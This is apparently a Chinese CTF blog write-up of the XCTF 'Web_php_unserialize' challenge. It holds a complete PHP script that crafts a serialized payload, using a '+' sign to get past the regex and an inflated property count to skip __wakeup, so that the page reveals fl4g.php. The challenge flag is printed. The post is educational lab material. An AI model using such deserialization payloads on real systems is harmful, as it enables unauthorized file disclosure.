攻防世界——Web_php_unserialize

最新推荐文章于 2024-03-22 20:11:29 发布
最新推荐文章于 2024-03-22 20:11:29 发布
阅读量178 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73942557/article/details/134118177
版权

访问网页以后首先显示这段源码,分析一下代码结构,包含一个类。里面包含了

三个魔术方法:__construct\__destruct\__wakeup

后面的判断中包含了isset魔术方法 ,base64_decode解密,正则表达式判断。

那么现在来思考如何绕过

1、@unserialize($var); @符号抑制了错误输出,所以无法通过这里进行信息获取

2、当调用这个脚本时会触发__wakeup魔术方法,需要对它进行绕过

那么我们通过改变让这个参数大于后面的index.php文件

$fcg=str_replace('1:{','2:{', $fcg);

3、然后考虑如何绕过正则化表达式,这里利用了+号对原来的内容做了替换

$fcg=str_replace('O:4','O:+4',$fcg);

4、这里有一个base64_decode()的解密我们需要将我们传递的内容进行加密

echo base64_encode($fcg);

最后我们整合一下

<?php

class Demo {

    private $file = 'index.php';

    public function __construct($file) {

        $this->file = $file;

    }

    function __destruct() {

        echo @highlight_file($this->file, true);

    }

    function __wakeup() {

        if ($this->file != 'index.php') {

            //the secret is in the fl4g.php

            $this->file = 'index.php';

        }

    }

}

$fcg=new Demo("fl4g.php"); //创建一个变量

$fcg=serialize($fcg);      //将他序列化

$fcg=str_replace('O:4','O:+4',$fcg);   //绕过正则表达式

$fcg=str_replace('1:{','2:{', $fcg);   //绕过wakeup

echo base64_encode($fcg);             //进行加密然后输出

?>

最后通过构造的语句输出结果

将构造好的payload传递进去

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

最终获得了正确答案

坚持学网安的小菜鸟
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
php中magic_quotes_gpc对unserialize的影响分析
10-25
主要介绍了php中magic_quotes_gpc对unserialize的影响,以实例的形式分析了magic_quotes_gpc安全过滤对unserialize造成的影响以及对此的解决方法,非常具有实用价值,需要的朋友可以参考下
phpunserialize返回false的解决方法
10-25
主要介绍了phpunserialize返回false的解决方法,是PHP程序设计中非常经典的问题,需要的朋友可以参考下
攻防世界php2_攻防世界 WEB Web_php_unserialize
weixin_39649490的博客
12-19 167
0x00 - 题目描述PHP 反序列,老题新做了。打开 index.php 是这样的0x01 - 解题过程先审计一下代码,执行过程是从 17 行开始。123456789101112131415161718192021222324252627...
web | CTF】攻防世界 Web_php_unserialize
weixin_46301214的博客
02-21 957
变量名:Demofile 变成 \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"大概意思应该是当反序列化的 属性变量数 大于 当前类的属性变量数 的时候,就什么安全性因素,就不触发。天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了。【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可。多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)既不简单,也不难,我也学了几天才算比较掌握。
Web_php_unserialize-攻防世界
最新发布
szhangliwenya的博客
03-22 805
最好直接替换,不要自己去替换Demo前后有空格自己看不出来,$file 是私有成员序列化之后字符串首尾会多出两个空格 “%00*%00”,所以base64加密最好在代码中执行防止复制漏掉。将O:4:改为O:+4:绕过匹配,将字符串中的属性1改为大于它的正整数 绕过_wakeup。类的实例,其中包含了对象的属性和值。不包含对象或类的序列化字符串,则尝试对其进行反序列化。在序列化字符串中,这通常用于分隔对象或类的名称与后面的属性数据。在 PHP 的序列化字符串中,对象或类后面通常会紧跟一个冒号。
攻防世界-web-Web_php_unserialize
wuh2333的博客
06-02 680
2.1 __wakeup函数:若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。根据以上分析,我们将Demo后门的1改为2即可绕过__wakeup函数,O:4改为O:+4即可绕过正则,再进行base64编码即可(这里注意一定要再代码中处理,线上以及一些工具上进行base64和php代码中进行base64获取到的结果不一样)
攻防世界Web_php_unserialize(超详细WP)
金 帛的博客
03-02 3198
攻防世界WP
XCTF-高手进阶区:Web_php_unserialize(详解)
1stPeak's Blog
02-29 3936
代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 716
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
攻防世界_Web_高手进阶区——Web_php_unserialize
Ho1aAs‘s Blog
11-01 239
文章目录解题思路完 解题思路 打开环境,先代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); }
攻防世界web——Web_php_unserialize
Zeker62的博客
08-23 161
靶场内容: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
PHP中json_encode、json_decode与serializeunserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
信息安全_数据安全_9_ZN2018_WV_-_PHP_unserialize.pdf
08-21
在本文中,我们将深入探讨与“信息安全”和“数据安全”相关的主题,特别是关于PHP `unserialize`函数的安全性问题。`unserialize`是PHP的一个内置函数,它用于从存储的表示形式创建PHP值。然而,这个功能在不适当...
weblogic_unserialize_exploit:Java反序列化vul以进行weblogic利用
04-30
weblogic unserialize exploitjava反序列化漏洞(CVE-2015-4852)的weblogic exploit命令回显exp1.依赖组件python 2.7java2. 程序说明exploit方法来源于Freebuf的”Java反序列化漏洞之weblogic本地利用实现篇”,...
浅谈php函数serialize()与unserialize()的使用方法
10-25
php中serialize()与unserialize()函数是一对函数,下面本文章就来为各位同学介绍serialize()与unserialize()函数的使用例子,希望能帮助到各位。
攻防世界web_php_unserialize题解
2301_77512689的博客
04-15 214
注意:这会改变填充到matches参数的数组,使其每个元素成为一个由 第0个元素是匹配到的字符串,第1个元素是该匹配字符串 在目标字符串subject中的偏移量。大致意思为,如果判断下一位字符是数字就goto yy20,如果是’+'就goto yy19,yy19则是对下一位字符的判断,如果下一位字符是数字,则继续goto yy20,如果不是则直接退出,那么。$matches[0]将包含完整模式匹配到的文本, $matches[1] 将包含第一个捕获子组匹配到的文本,以此类推。是如何实现的终止判断?
php serialize()与unserialize() 不完全研究
10-19
PHP中,`serialize()` 和 `unserialize()` 是两个非常重要的内置函数,它们主要用于数据的序列化和反序列化。序列化是将复杂的数据结构(如对象、数组)转换为字符串的过程,以便于存储或传输;反序列化则是将这个...
浅谈php serialize()与unserialize()的用法
10-27
PHP中,`serialize()` 和 `unserialize()` 是两个非常重要的内置函数,它们主要用于数据的序列化和反序列化。序列化是将复杂的数据结构(如对象、数组)转换为字符串的过程,便于存储或传输。而反序列化则是将这个...
攻防世界web_php_unserialize
06-28
### 回答1: 攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的。这个题目需要掌握PHP的序列化和反序列化函数,以及对序列化字符串的解析能力。 ### 回答2: web_php_unserialize指的是PHP反序列化漏洞。序列化是指将对象转换为字节流的过程,反序列化则是将字节流还原为原始对象的过程。PHP序列化对于数据的传输和存储非常方便,但是如果在执行反序列化过程中存在漏洞,就会导致恶意攻击者能够注入恶意代码,并可能导致代码执行、文件读写、远程代码执行等危险后果。攻防世界中的web_php_unserialize比赛就是通过挖掘实际漏洞并利用它们对目标进行攻击的比赛。 攻防世界中的web_php_unserialize比赛通常会考查参赛者对PHP反序列化漏洞的深入理解和实际应用能力。比赛中的攻击场景可能会包括以下几个方面: 1. 对序列化字符串的解析和理解。参赛者需要清楚地知道序列化字符串中不同数据类型的表示方法,包括字符串、数组、对象等。 2. 对序列化字符串中的数据类型和值进行篡改。恶意攻击者通常会利用序列化字符串的可篡改性注入恶意代码或者修改重要数据,参赛者需要在比赛中证明自己能够精准地修改序列化字符串中的数据类型和值。 3. 对反序列化函数的使用和理解。PHP反序列化漏洞很多都是由于对反序列化函数的不当使用导致的。参赛者需要清楚地知道反序列化函数参数的含义以及如何正确使用反序列化函数。 4. 对代码的理解和审计。比赛中可能会给出一些被漏洞的代码,参赛者需要仔细地审计代码并找出漏洞的具体原因。 总的来说,攻防世界中的web_php_unserialize比赛旨在锻炼参赛者的漏洞挖掘和漏洞利用能力,并通过挖掘实际漏洞来理解和掌握漏洞的本质和原理。 ### 回答3: 攻防世界web_php_unserialize是一种基于PHP反序列化漏洞的CTF题目。这个题目主要考察选手对于PHP反序列化漏洞的理解和应用能力。 在一般的PHP应用程序中,序列化是将一个对象或一组数据转换成一个数据流的过程,反序列化则是将这个数据流转回成对象或一组数据。反序列化漏洞是指当应用程序在反序列化过程中没有对数据流进行足够的验证和过滤,导致攻击者可以在数据流中注入恶意代码,以此来执行代码并最终造成攻击。这种漏洞在很多PHP应用程序中都存在,而攻防世界web_php_unserialize就是基于这个漏洞设计的一道CTF题目。 这个题目的主要思路是通过构造一个特定的序列化数据,并将其作为参数提交给目标站点。该序列化数据包含了一个恶意代码,在反序列化时可以执行恶意代码,从而完成攻击。选手需要先了解序列化和反序列化的原理,然后使用PHP代码构造一个带有恶意代码的序列化数据,成功利用反序列化漏洞执行代码并获取到flag。 这道题目对于选手的PHP语言理解和代码能力有一定的要求,同时也需要选手在考虑漏洞时具备一定的克制能力,对于数据的过滤和验证也需要有一定的认识。通过挑战攻防世界web_php_unserialize,选手可以深入了解PHP反序列化漏洞的原理和应用,有效提高自己的防御意识和CTF能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值